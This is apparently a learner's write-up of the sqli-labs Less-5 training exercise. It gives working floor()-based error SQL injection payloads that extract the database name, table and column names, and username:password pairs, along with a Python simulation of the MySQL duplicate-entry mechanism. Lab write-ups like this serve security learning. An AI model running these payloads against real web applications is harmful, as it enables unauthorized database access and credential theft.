Newbie injection learning: sqli-labs Less-5 learning record

Less-5, character-type double-query injection: floor() error-based injection

1. Determine the injection type and the injection point
(1) ?id=1' displays an error page, and the database error message is echoed.
?id=1' and 1=1--+ displays the page normally.
?id=1' and 1=2--+ displays abnormally (the "You are in..." line disappears).
(2) These basic tests confirm that an injection point exists and that the parameter is wrapped in single quotes. The difference from the earlier levels is that Less-5 only prints "You are in..........." and never displays any query result, so a plain union select cannot be used to display data in the page.
(3) Since the error page does echo the database error message, error-based injection can be used here. Here I use floor() error-based injection.
2. Get the database name

?id=-1' union select 1,count(*),concat_ws('~',(select database()),floor(rand(0)*2))as a from information_schema.tables group by a--+

[screenshot: the Duplicate entry error message shows the database name]


3. Get the table names

?id=-1' union select 1,count(*),concat_ws('~',(select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2)) as a from information_schema.tables group by a--+

[screenshot: the error message shows the table names]


4. Get the column names

?id=-1' union select 1,count(*),concat_ws('~',(select group_concat(column_name) from information_schema.columns where table_name='users'),floor(rand(0)*2)) as a from information_schema.tables group by a--+

[screenshot: the error message shows the column names of users]


5. Get the field contents

?id=-1' union select 1,count(*),concat_ws('~',(select concat_ws(':',username,password)from users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a--+

[screenshot: the error message shows username:password of the first row]


PS: newbie summary

(1) Analysis of the floor() error-based injection principle (see the detailed explanation in this blog post)
https://www.cnblogs.com/litlife/p/8472323.html
(2) CONCAT_WS() is a special form of CONCAT(). The first argument is the separator for the remaining arguments; it is placed between each pair of strings being joined. The separator can be a string or any other argument.
(3) Since the error message can only carry one row, limit is usually appended so that the data is retrieved one row per query.
limit m,n means start from the (m+1)-th row (m counts from 0) and fetch n rows.
limit 1,1 means start from the second row and fetch one row; limit n means fetch the first n rows starting from row 0.
Two more things to watch: MySQL truncates the value shown in the Duplicate entry error to 64 characters, so a long group_concat() result has to be paged with substr()/mid() as well; and the column query above filters only on table_name='users', so if another database also has a users table, add and table_schema=database() to the where clause.
(4) Less-5 mainly teaches choosing error-based injection according to how the error page behaves. floor() error-based injection runs two select queries inside one payload, which is why it is called double-query injection.
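The reason the payloads above throw an error is that MySQL evaluates the GROUP BY key once to probe its temporary aggregation table and, when the key is not there yet, evaluates it a second time while inserting the new group. Because rand(0) is seeded, floor(rand(0)*2) always yields the same sequence, so the two evaluations collide on the third source row. The Python script below is an added example (not code from the original post or from sqli-labs) that simulates that mechanism; the rand(0) sequence is supplied as constructed input rather than computed from MySQL's generator, and the secret string stands in for what database() or group_concat() would return.

```python
"""Simulate why `count(*) ... group by concat_ws('~', secret, floor(rand(0)*2))`
makes MySQL raise "Duplicate entry ... for key 'group_key'".

Added example for illustration; it is not code from sqli-labs or the original post.
"""
from typing import Iterator, List

# Constructed input: the first values of floor(rand(0)*2) in MySQL are commonly
# listed as 0,1,1,0,1,1,0,0,1,1,1,0. Only the first five matter for the collision.
RAND0_FLOOR_SEQ: List[int] = [0, 1, 1, 0, 1, 1, 0, 0, 1, 1, 1, 0]

MAX_ENTRY_LEN = 64  # MySQL truncates the key shown in the Duplicate entry error


class DuplicateEntry(Exception):
    """Stand-in for MySQL error 1062 (ER_DUP_ENTRY)."""


def group_by_simulation(key_source: Iterator[str], n_rows: int) -> dict:
    """Simulate MySQL's temp-table aggregation for `select count(*) ... group by a`.

    key_source yields the value of the GROUP BY expression each time MySQL
    evaluates it. The lookup and the insert each evaluate it once, which is
    what makes a non-deterministic key dangerous.
    """
    groups: dict = {}
    for _ in range(n_rows):
        lookup_key = next(key_source)      # 1st evaluation: probe the temp table
        if lookup_key in groups:
            groups[lookup_key] += 1
        else:
            insert_key = next(key_source)  # 2nd evaluation: value actually stored
            if insert_key in groups:
                raise DuplicateEntry(
                    f"Duplicate entry '{insert_key[:MAX_ENTRY_LEN]}' for key 'group_key'"
                )
            groups[insert_key] = 1
    return groups


def leaked_keys(secret: str, floor_seq: List[int]) -> Iterator[str]:
    """Mimic concat_ws('~', secret, floor(rand(0)*2)) for every evaluation."""
    for bit in floor_seq:
        yield f"{secret}~{bit}"


def run_payload(secret: str, n_rows: int, floor_seq: List[int] = RAND0_FLOOR_SEQ) -> str:
    """Return the error text the injection would surface, or '' if no error occurs.

    n_rows is the number of rows in the table the payload selects FROM
    (information_schema.tables in the post, which always has far more than 3).
    """
    try:
        group_by_simulation(leaked_keys(secret, floor_seq), n_rows)
    except DuplicateEntry as exc:
        return str(exc)
    return ""


def extract_secret(error_text: str) -> str:
    """Pull the leaked value back out of the error, dropping the ~0/~1 marker."""
    prefix = "Duplicate entry '"
    start = error_text.index(prefix) + len(prefix)
    end = error_text.index("' for key")
    entry = error_text[start:end]
    return entry.rsplit("~", 1)[0]


if __name__ == "__main__":
    # Three source rows: lookup 0 -> insert 1; lookup 1 hit; lookup 0 -> insert 1 collides.
    print(run_payload("security", n_rows=3))
    # Only two source rows: no collision, so nothing leaks.
    print(repr(run_payload("security", n_rows=2)))
    # A long group_concat() result is cut at 64 characters in the error text.
    print(len(extract_secret(run_payload("x" * 70, n_rows=3))))
```

The simulation shows the two caveats a practitioner runs into: the FROM table must have at least three rows (which is why information_schema.tables is the usual choice), and anything longer than 64 characters is lost from the error message unless it is paged with substr()/mid().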


Newbie injection learning record!!


Origin: www.cnblogs.com/ersuani/p/sqlilab_less5.html